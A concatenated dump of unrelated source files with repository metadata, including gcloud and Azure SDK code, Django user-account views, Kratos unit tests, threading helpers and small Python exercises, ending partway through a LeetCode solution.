raise exceptions.ToolException('At least one property must be modified.')
def GetSetRequest(self, client, backend_service_ref, replacement):
if (backend_service_ref.Collection() == 'compute.backendServices') and (
replacement.failoverPolicy):
raise exceptions.InvalidArgumentException(
'--global',
'cannot specify failover policies for global backend services.')
return super(UpdateAlpha, self).GetSetRequest(client, backend_service_ref,
replacement)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class UpdateBeta(UpdateGA):
"""Update a backend service.
*{command}* is used to update backend services.
"""
HEALTH_CHECK_ARG = None
HTTP_HEALTH_CHECK_ARG = None
HTTPS_HEALTH_CHECK_ARG = None
SECURITY_POLICY_ARG = None
@classmethod
def Args(cls, parser):
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.AddArgument(
parser, operation_type='update')
flags.AddDescription(parser)
cls.HEALTH_CHECK_ARG = flags.HealthCheckArgument()
cls.HEALTH_CHECK_ARG.AddArgument(parser, cust_metavar='HEALTH_CHECK')
cls.HTTP_HEALTH_CHECK_ARG = flags.HttpHealthCheckArgument()
cls.HTTP_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTP_HEALTH_CHECK')
cls.HTTPS_HEALTH_CHECK_ARG = flags.HttpsHealthCheckArgument()
cls.HTTPS_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTPS_HEALTH_CHECK')
cls.SECURITY_POLICY_ARG = (
security_policy_flags.SecurityPolicyArgumentForTargetResource(
resource='backend service'))
cls.SECURITY_POLICY_ARG.AddArgument(parser)
flags.AddTimeout(parser, default=None)
flags.AddPortName(parser)
flags.AddProtocol(parser, default=None)
flags.AddConnectionDrainingTimeout(parser)
flags.AddEnableCdn(parser, default=None)
flags.AddSessionAffinity(parser, internal_lb=True)
flags.AddAffinityCookieTtl(parser)
AddIapFlag(parser)
flags.AddCacheKeyIncludeProtocol(parser, default=None)
flags.AddCacheKeyIncludeHost(parser, default=None)
flags.AddCacheKeyIncludeQueryString(parser, default=None)
flags.AddCacheKeyQueryStringList(parser)
flags.AddCustomRequestHeaders(parser, remove_all_flag=True, default=None)
signed_url_flags.AddSignedUrlCacheMaxAge(
parser, required=False, unspecified_help='')
def Modify(self, client, resources, args, existing):
"""Modify Backend Service."""
replacement = super(UpdateBeta, self).Modify(client, resources, args,
existing)
if args.connection_draining_timeout is not None:
replacement.connectionDraining = client.messages.ConnectionDraining(
drainingTimeoutSec=args.connection_draining_timeout)
if args.no_custom_request_headers is not None:
replacement.customRequestHeaders = []
if args.custom_request_header is not None:
replacement.customRequestHeaders = args.custom_request_header
backend_services_utils.ApplyCdnPolicyArgs(
client,
args,
replacement,
is_update=True,
apply_signed_url_cache_max_age=True)
return replacement
def ValidateArgs(self, args):
"""Validate arguments."""
if not any([
args.affinity_cookie_ttl is not None,
args.connection_draining_timeout is not None,
args.no_custom_request_headers is not None,
args.custom_request_header is not None,
args.description is not None,
args.enable_cdn is not None,
args.cache_key_include_protocol is not None,
args.cache_key_include_host is not None,
args.cache_key_include_query_string is not None,
args.cache_key_query_string_whitelist is not None,
args.cache_key_query_string_blacklist is not None,
args.health_checks,
args.http_health_checks,
args.https_health_checks,
args.IsSpecified('iap'),
args.port_name,
args.protocol,
args.security_policy is not None,
args.session_affinity is not None,
args.IsSpecified('signed_url_cache_max_age'),
args.timeout is not None,
]):
raise exceptions.ToolException('At least one property must be modified.')
|
[
"[email protected]"
] | |
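UpdateGA.Run above follows a get-modify-set pattern: fetch the backend service, apply only the flags the user set, and push the full replacement only if something changed. A stripped-down sketch of that control flow (fetch/modify/push are hypothetical stand-ins, not the real gcloud plumbing):
def update_resource(fetch, modify, push, args):
    existing = fetch()                 # GET the current resource
    proposed = modify(existing, args)  # apply only user-specified flags
    if proposed == existing:
        # nothing changed: skip the write, mirroring the skip in Run()
        print("No change requested; skipping update.")
        return [existing]
    return push(proposed)              # UPDATE with the full replacement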
6fd38298e6c06da5b7a9c85a6acb9e33eaaa8531
|
e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67
|
/azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2016_12_01/models/flow_log_information.py
|
ad2b8721b840a00057bc3671a586e0b6b65dddb0
|
[] |
no_license
|
EnjoyLifeFund/macHighSierra-cellars
|
59051e496ed0e68d14e0d5d91367a2c92c95e1fb
|
49a477d42f081e52f4c5bdd39535156a2df52d09
|
refs/heads/master
| 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null |
UTF-8
|
Python
| false | false | 1,856 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FlowLogInformation(Model):
"""Information on the configuration of flow log.
:param target_resource_id: The ID of the resource to configure for flow
logging.
:type target_resource_id: str
:param storage_id: ID of the storage account which is used to store the
flow log.
:type storage_id: str
:param enabled: Flag to enable/disable flow logging.
:type enabled: bool
:param retention_policy:
:type retention_policy: :class:`RetentionPolicyParameters
<azure.mgmt.network.v2016_12_01.models.RetentionPolicyParameters>`
"""
_validation = {
'target_resource_id': {'required': True},
'storage_id': {'required': True},
'enabled': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'storage_id': {'key': 'properties.storageId', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'retention_policy': {'key': 'properties.retentionPolicy', 'type': 'RetentionPolicyParameters'},
}
def __init__(self, target_resource_id, storage_id, enabled, retention_policy=None):
self.target_resource_id = target_resource_id
self.storage_id = storage_id
self.enabled = enabled
self.retention_policy = retention_policy
|
[
"[email protected]"
] | |
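Given the required fields declared in _validation, constructing the model above looks roughly like this (the Azure resource IDs are placeholders):
info = FlowLogInformation(
    target_resource_id="/subscriptions/<sub>/resourceGroups/<rg>"
                       "/providers/Microsoft.Network/networkSecurityGroups/example-nsg",
    storage_id="/subscriptions/<sub>/resourceGroups/<rg>"
               "/providers/Microsoft.Storage/storageAccounts/examplestore",
    enabled=True,
)
# retention_policy stays None unless a RetentionPolicyParameters is supplied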
97e33fe4f5d5aefa00b2158878f7bc01c15bd8ec
|
dc99adb79f15b3889a7ef6139cfe5dfc614889b8
|
/Aplikace_1_0/Source/ewitis/data/db.py
|
26dacf3f02ebbf16712e8a6bc349676538d6df44
|
[] |
no_license
|
meloun/ew_aplikace
|
95d1e4063a149a10bb3a96f372691b5110c26b7b
|
f890c020ad8d3d224f796dab3f1f222c1f6ba0eb
|
refs/heads/master
| 2023-04-28T06:43:12.252105 | 2023-04-18T19:59:36 | 2023-04-18T19:59:36 | 2,674,595 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 417 |
py
|
'''
Created on 8.12.2013
@author: Meloun
'''
import libs.sqlite.sqlite as sqlite
#=======================================================================
# DATABASE
#=======================================================================
print "I: Database init"
try:
db = sqlite.sqlite_db("db/test_db.sqlite")
db.connect()
except:
print "E: Database"
|
[
"[email protected]"
] | |
7605014773f49f01d2f7d6e63c97b2e5e3735fd1
|
da687718aa8ce62974090af63d25e057262e9dfe
|
/cap12-dicionarios/dicionarios_aninhados/inventario2.py
|
16e00d7872c4b80f9ecb062d75e3ca72f267f1e7
|
[] |
no_license
|
frclasso/revisao_Python_modulo1
|
77928fa4409c97d49cc7deccdf291f44c337d290
|
1e83d0ef9657440db46a8e84b136ac5f9a7c556e
|
refs/heads/master
| 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 360 |
py
|
#!/usr/bin/env python3
inventory = {'Sword': {'attack': 5, 'defence': 1,
'weight':15, 'price': 2},
'Armor':{'attack':0, 'defence': 10,
'weight':25, 'price': 5}
}
for name, item in inventory.items():
print('{0}: {1[attack]} {1[defence]} {1[weight]} {1[price]}'.format(name, item))
|
[
"[email protected]"
] | |
ebb3dff07a902763e88bf53719711bec7c75ff06
|
ae6c2a6fa37613ac31b2bd3537b3276c9b333632
|
/search/migrations/0012_auto_20170822_1207.py
|
576f43db2917f84833616caefcb3759c3b8b7f67
|
[
"Apache-2.0"
] |
permissive
|
salopensource/sal
|
435a31904eb83048c02c9fbff02bbf832835d1b4
|
0895106c6729d5465da5e21a810e967a73ed6e24
|
refs/heads/main
| 2023-08-03T06:53:40.142752 | 2023-07-28T15:51:08 | 2023-07-28T15:51:08 | 35,883,375 | 227 | 94 |
Apache-2.0
| 2023-07-28T15:51:10 | 2015-05-19T13:21:57 |
Python
|
UTF-8
|
Python
| false | false | 451 |
py
|
# Generated by Django 1.10 on 2017-08-22 19:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('search', '0011_auto_20170810_1205'),
]
operations = [
migrations.AlterField(
model_name='savedsearch',
name='name',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
|
[
"[email protected]"
] | |
ca4adf24f6c210b339e3770daa1efd98e8b87ce2
|
d5fbec8208b9a65032bdd2b550c7dde795d5661b
|
/kratos/tests/test_time_discretization.py
|
34fec9075ad0f9577ad12f0fb7482af71a49a096
|
[
"BSD-3-Clause"
] |
permissive
|
Ginux1994/Kratos
|
9dc5f7b5a427b0a258cd01fbd0bffae19571a81a
|
2893e855a07e5cb3b0e6bc549c646fca4a525a99
|
refs/heads/master
| 2020-04-10T16:49:50.748887 | 2018-12-10T09:43:37 | 2018-12-10T09:43:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,588 |
py
|
from __future__ import print_function, absolute_import, division
import KratosMultiphysics as KM
import KratosMultiphysics.KratosUnittest as KratosUnittest
class TestTimeDiscretization(KratosUnittest.TestCase):
def test_BDF1(self):
bdf = KM.BDF1()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 2)
self.assertAlmostEqual(coeffs[0], 1.0/delta_time)
self.assertAlmostEqual(coeffs[1], -1.0/delta_time)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 2)
def test_BDF2(self):
bdf = KM.BDF2()
delta_time = 0.11
prev_delta_time = 0.089
coeffs = bdf.ComputeBDFCoefficients(delta_time, prev_delta_time)
self.assertEqual(len(coeffs), 3)
        rho = prev_delta_time / delta_time
        time_coeff = 1.0 / (delta_time * rho * rho + delta_time * rho)
self.assertAlmostEqual(coeffs[0], time_coeff * (rho * rho + 2.0 * rho))
self.assertAlmostEqual(coeffs[1], -time_coeff * (rho * rho + 2.0 * rho + 1.0))
self.assertAlmostEqual(coeffs[2], time_coeff)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 3)
def test_BDF3(self):
bdf = KM.BDF3()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 4)
self.assertAlmostEqual(coeffs[0], 11.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[1], -18.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[2], 9.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[3], -2.0/(6.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 4)
def test_BDF4(self):
bdf = KM.BDF4()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 5)
self.assertAlmostEqual(coeffs[0], 25.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[1], -48.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[2], 36.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[3], -16.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[4], 3.0/(12.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 5)
def test_BDF5(self):
bdf = KM.BDF5()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 6)
self.assertAlmostEqual(coeffs[0], 137.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -200.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 75.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -12.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 6)
def test_BDF6(self):
bdf = KM.BDF6()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 7)
self.assertAlmostEqual(coeffs[0], 147.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -360.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 450.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -400.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 225.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -72.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[6], 10.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 7)
def test_Newmark(self):
gen_alpha = KM.Newmark()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.25)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.5)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_Bossak(self):
gen_alpha = KM.Bossak()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_GeneralizedAlpha(self):
gen_alpha = KM.GeneralizedAlpha()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertAlmostEqual(gen_alpha.GetAlphaF(), 0.0)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
if __name__ == '__main__':
KratosUnittest.main()
|
[
"[email protected]"
] | |
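The numbers asserted in test_BDF2 above are the variable-step BDF2 coefficients; in LaTeX, using the same rho = prev_delta_time / delta_time convention as the test (a sketch reconstructed from the test, not taken from the Kratos docs):
\rho = \frac{\Delta t_{\mathrm{prev}}}{\Delta t}, \qquad
c_t = \frac{1}{\Delta t\,(\rho^2 + \rho)}, \qquad
\dot{y}^{\,n+1} \approx c_t(\rho^2 + 2\rho)\,y^{n+1}
                - c_t(\rho^2 + 2\rho + 1)\,y^{n} + c_t\,y^{n-1}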
4def4a44ca4457ea04f4023ba49dae670040dc78
|
bc183f7357cda3ad064f8c2ff34a176c406446d3
|
/pastepwn/util/threadingutils.py
|
54451a26289cd5ba3667d162722837819e9aadcf
|
[
"MIT"
] |
permissive
|
luton1507/pastepwn
|
b8a790168ce08f10c62574eeb0a68f0dedd5425d
|
9b2fee22857e54a5312fdb3d388b472a7d271c50
|
refs/heads/master
| 2022-11-10T20:18:40.102277 | 2020-06-19T23:34:14 | 2020-06-19T23:34:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,915 |
py
|
# -*- coding: utf-8 -*-
import logging
from threading import Thread, current_thread
def start_thread(target, name, exception_event, *args, **kwargs):
"""
Starts a thread passed as argument and catches exceptions that happens during execution
:param target: Method to be executed in the thread
:param name: Name of the thread
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the threaded method
:param kwargs: Keyword-Arguments to be passed to the threaded method
:return:
"""
thread = Thread(target=thread_wrapper, name=name, args=(target, exception_event) + args, kwargs=kwargs)
thread.start()
return thread
def thread_wrapper(target, exception_event, *args, **kwargs):
"""
Wrapper around the execution of a passed method, that catches and logs exceptions
:param target: Method to be executed
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the target method
:param kwargs: Keyword-Arguments to be passed to the target method
:return:
"""
thread_name = current_thread().name
logger = logging.getLogger(__name__)
logger.debug('{0} - thread started'.format(thread_name))
try:
target(*args, **kwargs)
except Exception:
exception_event.set()
logger.exception('unhandled exception in %s', thread_name)
raise
logger.debug('{0} - thread ended'.format(thread_name))
def join_threads(threads):
"""
End all threads and join them back into the main thread
:param threads: List of threads to be joined
:return:
"""
logger = logging.getLogger(__name__)
for thread in threads:
logger.debug("Joining thread {0}".format(thread.name))
thread.join()
logger.debug("Thread {0} has ended".format(thread.name))
|
[
"[email protected]"
] | |
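A minimal sketch of how the helpers above are meant to be combined (the worker function and its argument are illustrative):
from threading import Event

def worker(n):
    print("working on", n)

exception_event = Event()
threads = [start_thread(worker, "worker-%d" % i, exception_event, i)
           for i in range(2)]
join_threads(threads)
if exception_event.is_set():
    print("a worker raised; the traceback was logged by thread_wrapper")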
5955661160554d40102fc8a32fa5b056bbf75e99
|
f0a4ba1f1f941092e68e4b1ef9cff0d3852199ef
|
/Do_it!/5.재귀 알고리즘/비재귀적 표현-재귀를제거.py
|
5c4d998075cc37ef533ac96b4ff5819b45653e53
|
[] |
no_license
|
lsb530/Algorithm-Python
|
d41ddd3ca7675f6a69d322a4646d75801f0022b2
|
a48c6df50567c9943b5d7218f874a5c0a85fcc6d
|
refs/heads/master
| 2023-06-18T04:36:09.221769 | 2021-06-28T16:49:35 | 2021-06-28T16:49:35 | 367,775,760 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
# Implementing the recursive function with a stack (recursion removed)
from stack import Stack  # import the Stack class from stack.py
def recur(n: int) -> None:
    """recur() with the recursion removed"""
    s = Stack(n)
    while True:
        if n > 0:
            s.push(n)  # push the value of n
            n = n - 1
            continue
        if not s.is_empty():  # if the stack is not empty
            n = s.pop()  # pop the saved value into n
print(n)
n = n - 2
continue
break
x = int(input('정숫값을 입력하세요 : '))
recur(x)
|
[
"[email protected]"
] | |
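For reference, this is the recursive form that the stack-based recur() above eliminates -- the push simulates the pending return point of the first recursive call, and n - 2 the second call (reconstructed from the iteration; a sketch):
def recur_recursive(n: int) -> None:
    if n > 0:
        recur_recursive(n - 1)
        print(n)
        recur_recursive(n - 2)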
4e302d4189e5a495aee3296edc2d2144b00d4046
|
951a77d2ff181b045104f1482ed6910869733ec9
|
/apps/user/views.py
|
493dad7fa6d6d5d36f5f322e74849f177baa0cee
|
[
"Apache-2.0"
] |
permissive
|
fblrainbow/ShopPro
|
7d89b7d3ba5dd2ba470b0d46114893e2e83513c1
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
refs/heads/master
| 2023-07-28T18:32:12.116290 | 2019-02-24T08:11:34 | 2019-02-24T08:11:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,311 |
py
|
from django.shortcuts import render
import json
from django.shortcuts import render, get_object_or_404, reverse
from django.http import HttpResponseRedirect, JsonResponse, HttpResponse
# Class-based views: inherit from View
from django.views.generic.base import View
# Import the models we need
from .models import UserProfile, EmailVerifyRecord, Address
# For OR (union) queries
from django.db.models import Q
# Allow logging in with an email address: override the auth backend
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.hashers import make_password
from django.contrib.auth.decorators import login_required
# Email verification for registration / password recovery
# from utils.email_sent import sent_register_email
# Send email asynchronously
from .tasks import sent_register_email
# Paginate the records fetched from the database
from django.core.paginator import Paginator
from ShopPro.settings import PAGE_SETTING
# Messages framework
from django.contrib import messages
# Test view for sending email
class EmailTestView(View):
def get(self, request):
sent_register_email.delay('[email protected]', 'register')
return HttpResponse("发送成功!")
# Custom backend: allow login with either email or username
class CustomBackend(ModelBackend):
def authenticate(self, username=None, password=None, **kwargs):
try:
user = UserProfile.objects.get(Q(username=username) | Q(email=username))
if user.check_password(password):
return user
except Exception as e:
return None
# User registration
class RegisterView(View):
    def get(self, request):
        # If already logged in, redirect to the home page
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("index"))
return render(request, "user/register.html", {})
def post(self, request):
username = request.POST.get("user_name", "")
pwd = request.POST.get("pwd", "")
email = request.POST.get("email", "")
if all([username, email, pwd]):
result = UserProfile.objects.filter(username=username).first()
if result:
                # This username is already registered
return render(request, 'user/register.html',
{"msg": "用户名被占用!"})
user = UserProfile(username=username, email=email, password=make_password(pwd), is_active=False)
user.save()
print("收到注册请求 准备发送邮箱验证码")
            # Send the activation email -- needs to be asynchronous
            sent_register_email.delay(email, "register")
            # sent_register_email(email, "register")
            # Registration step finished
return render(request, 'user/register_complate.html',
{"email": email})
else:
return render(request, 'user/register.html',
{"msg": "用户名/邮箱/密码均不能为空!"})
# User activation
class ActivateView(View):
    def get(self, request):
        # If already logged in, redirect to the home page
if request.user.is_authenticated:
return HttpResponseRedirect(reverse("index"))
codes = request.GET.get("code")
code = EmailVerifyRecord.objects.filter(code=codes).first()
if code:
email = code.email
user = UserProfile.objects.get(email=email)
user.is_active = True
user.save()
            # Activation succeeded: redirect to the login page
            return HttpResponseRedirect(reverse("login"))
        else:
            # Activation failed: redirect to the registration page
return HttpResponseRedirect(reverse("register"))
def post(self, request):
return render(request, "product/index.html",
{})
# User login
class LoginView(View):
    def get(self, request):
        # If already logged in, redirect to the home page
if request.user.is_authenticated:
return HttpResponseRedirect(reverse('index'))
return render(request, "user/login.html", {})
def post(self, request):
        # Check whether the login succeeds
username = request.POST.get("username", "")
pwd = request.POST.get("pwd", "")
# print("用户名:{} 密码:{}".format(username, pwd))
if all([username, pwd]):
user = authenticate(username=username, password=pwd)
if user:
if UserProfile.objects.get(username=username).is_active:
login(request, user)
return HttpResponseRedirect(reverse('index'))
else:
return render(request, "user/login.html",
{"msg": "用户尚未激活!去邮箱激活!"})
return render(request, "user/login.html",
{"msg": "用户名或密码错误!"})
# Log out
class LogoutView(View):
    # Log out, then redirect to the login page
    def get(self, request):
        # Only meaningful if the user is logged in
        if request.user.is_authenticated:
            # Logged in: perform the logout
            logout(request)
            return HttpResponseRedirect(reverse('login'))
        return HttpResponseRedirect(reverse("index"))
    # In principle this view is never used
def post(self, request):
return render(request, "product/index.html", {})
# Forgot password / change password -- to be completed later
class ForgetPwdView(View):
    def get(self, request):
        # If already logged in, redirect to the home page
        if request.user.is_authenticated:
            return HttpResponseRedirect(reverse("index"))
        return render(request, "user/find_pwd.html", {})
    def post(self, request):
        # Take an email address and send a verification code to it
username = request.POST.get("username", "")
email = request.POST.get("email", "")
if all([username, email]):
            # Check that the username and email belong to the same user
            result = UserProfile.objects.filter(
                username=username,
                email=email
            ).first()
            if result:
                # Send the email
sent_register_email.delay(email, "forget")
# sent_register_email(email, "forget")
return render(request, "user/find_complate.html",
{"email": email})
return render(request, 'user/find_pwd.html',
{"msg": "您输入的用户名或邮箱不对"})
# Check that the username and email match
class CheckUserEmailView(View):
    def post(self, request):
        username = request.POST.get("username", "")
        email = request.POST.get("email", "")
        if all([username, email]):
            # Check that the username and email belong to the same user
result = UserProfile.objects.filter(
username=username,
email=email
).first()
if result:
data = {
"code": 3,
"msg": "ok"
}
else:
data = {
"code": 0,
"msg": "用户名或邮箱不存在"
}
else:
data = {
"code": 0,
"msg": "用户名或邮箱不能为空"
}
return JsonResponse(data)
# Reset password
class ResetPwdView(View):
    def get(self, request):
        # If already logged in, redirect to the home page
        if request.user.is_authenticated:
            return HttpResponseRedirect(reverse("index"))
        code = request.GET.get("code", "")
        if code:
            # Look up this verification code
all_code = EmailVerifyRecord.objects.filter(code=code).last()
if all_code:
email = all_code.email
return render(request, "user/reset_pwd.html",
{"email": email})
return render(request, "product/index.html")
    # Submit the new password
def post(self, request):
pwd = request.POST.get("pwd", "")
email = request.POST.get("email", "")
if all([pwd, email]):
user = UserProfile.objects.filter(email=email).first()
user.password = make_password(password=pwd)
user.save()
data = {
"code": 3,
"msg": "密码修改成功"
}
# return HttpResponseRedirect(reverse("login"))
else:
data = {
"code": 0,
"msg": "密码修改失败"
}
# return render(request, "product/index.html")
return JsonResponse(data)
# Personal profile center
class InfoView(View):
def get(self, request):
if request.user.is_authenticated:
user = UserProfile.objects.filter(username=request.user.username).first()
return render(request, "user/user_center_info.html",
{"user": user, })
else:
return render(request, 'user/login.html')
def post(self, request):
return render(request, "", {})
# All addresses
class AddressView(View):
def get(self, request):
if request.user.is_authenticated:
address_list = Address.objects.filter(user_id=request.user.id).all()
return render(request, "user/user_center_site.html",
{"address_list": address_list})
else:
return render(request, 'user/login.html')
    # Add a new address
def post(self, request):
if request.user.is_authenticated:
is_default = request.POST.get("is_default", False)
if is_default:
is_default = True
name = request.POST.get("name", "")
s_province = request.POST.get("s_province", "")
s_city = request.POST.get("s_city", "")
s_county = request.POST.get("s_county", "")
detail = request.POST.get("detail_area", "")
zip_code = request.POST.get("code", "")
mobile = request.POST.get("mobile", "")
base_add = "{} {} {}".format(s_province, s_city, s_county)
if all([is_default, base_add, detail, zip_code, mobile, name]):
address_info = Address(
user_id=request.user.id,
is_default=is_default, address=base_add,
detail=detail, zip_code=zip_code,
mobile=mobile, name=name,
)
address_info.save()
data = {
"code": 3,
"msg": "添加成功",
}
else:
data = {
"code": 0,
"msg": "添加失败",
}
else:
data = {
"code": 0,
"msg": "添加失败",
}
return JsonResponse(data)
# My wallet
class WalletView(View):
def get(self, request):
return render(request, "", {})
def post(self, request):
return render(request, "", {})
# My coupons
class CouponView(View):
def get(self, request):
return render(request, "", {})
def post(self, request):
return render(request, "", {})
|
[
"[email protected]"
] | |
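For CustomBackend above to be used by authenticate(), Django must be told about it in settings; a sketch (the dotted path is assumed from this repo's apps/user/views.py layout):
# settings.py (sketch)
AUTHENTICATION_BACKENDS = [
    'apps.user.views.CustomBackend',               # assumed module path
    'django.contrib.auth.backends.ModelBackend',   # keep the default as fallback
]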
437500d29d4bb52a2d7175702b3a9674cc625015
|
0562a138eaa1b460a6bf94f4a724b32a79186900
|
/aat/common.py
|
55e9be1071ca53160b581ef93e4a7e908cf04fc9
|
[
"Apache-2.0"
] |
permissive
|
sylinuxhy/aat
|
15dc00bda32aed91aaad5c6122982114874342e4
|
8113365e6f0c307156d43c0dee594bf66ff8b4fa
|
refs/heads/main
| 2023-01-28T06:49:58.646911 | 2020-12-05T01:31:15 | 2020-12-05T01:31:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,554 |
py
|
import os
import itertools
import functools
import pandas as pd # type: ignore
@functools.lru_cache()
def _in_cpp():
_cpp = os.environ.get("AAT_USE_CPP", "").lower() in ("1", "on")
try:
from aat.binding import ( # type: ignore # noqa: F401
SideCpp,
EventTypeCpp,
DataTypeCpp,
InstrumentTypeCpp,
OrderTypeCpp,
OrderFlagCpp,
OrderBookCpp,
ExchangeTypeCpp,
InstrumentCpp,
DataCpp,
EventCpp,
OrderCpp,
TradeCpp,
)
except ImportError:
if _cpp:
# raise if being told to use c++
raise
return False
return _cpp
def id_generator():
__c = itertools.count()
def _gen_id():
return next(__c)
return _gen_id
def _merge(lst1, lst2, sum=True):
"""merge two lists of (val, datetime) and accumulate"""
df1 = pd.DataFrame(lst1, columns=("val1", "date1"))
df1.set_index("date1", inplace=True)
# df1.drop_duplicates(inplace=True)
df2 = pd.DataFrame(lst2, columns=("val2", "date2"))
df2.set_index("date2", inplace=True)
# df2.drop_duplicates(inplace=True)
df = df1.join(df2, how="outer")
# df = pd.concat([df1, df2], axis=1)
df.fillna(method="ffill", inplace=True)
df.fillna(0.0, inplace=True)
if sum:
df = df.sum(axis=1)
else:
df = df.mean(axis=1)
df = df.reset_index().values.tolist()
return [(b, a.to_pydatetime()) for a, b in df]
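

# --- Illustrative sketch (not part of the module's public API) ---
# Demonstrates _merge: outer-join two (value, datetime) series on timestamp,
# forward-fill gaps, then sum (sum=True) or average the aligned values.
if __name__ == "__main__":
    from datetime import datetime

    lst1 = [(1.0, datetime(2020, 1, 1)), (2.0, datetime(2020, 1, 3))]
    lst2 = [(10.0, datetime(2020, 1, 2))]
    # Expected: [(1.0, Jan 1), (11.0, Jan 2), (12.0, Jan 3)]
    print(_merge(lst1, lst2))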
|
[
"[email protected]"
] | |
72343fcac5794c27da7dd3512015ec98664b8821
|
f5d1ef8ea6173b3b380fa2985fe346162a0b68b3
|
/740_Delete_and_Earn.py
|
fb379e2b588d56ce1b72bdf0c95366aea22dbdde
|
[] |
no_license
|
ZDawang/leetcode
|
a66801a2ed5b06ee4e489613885a22e3130618c7
|
a46b07adec6a8cb7e331e0b985d88cd34a3d5667
|
refs/heads/master
| 2021-09-11T15:21:36.496025 | 2018-04-09T06:28:56 | 2018-04-09T06:28:56 | 111,512,346 | 8 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,596 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#author : zhangdawang
#date: 2017-12
#difficulty degree:
#problem: 740_Delete_and_Earn
#time_complexity:
#space_complexity:
#beats:
from collections import Counter
class Solution(object):
    #DP
    #dp[i] stores the max score over the i smallest distinct values, given that the i-th smallest is taken.
    #If the i-th smallest value == (i-1)-th smallest + 1: dp[i] = max(dp[j] for j in range(i - 1)) + n * c
    #otherwise: dp[i] = max(dp[j] for j in range(i)) + n * c
    #Space O(n); worst-case time O(nlogn) (sorting)
def deleteAndEarn(self, nums):
if not nums: return 0
        #Count occurrences and sort ascending by value
count = sorted(Counter(nums).items(), key = lambda x: x[0])
dp = [0] * len(count)
        #Stores the max points over entries 0..i-2 (inclusive).
maxpoint = 0
for i, (n, c) in enumerate(count):
if n - 1 == count[i - 1][0]:
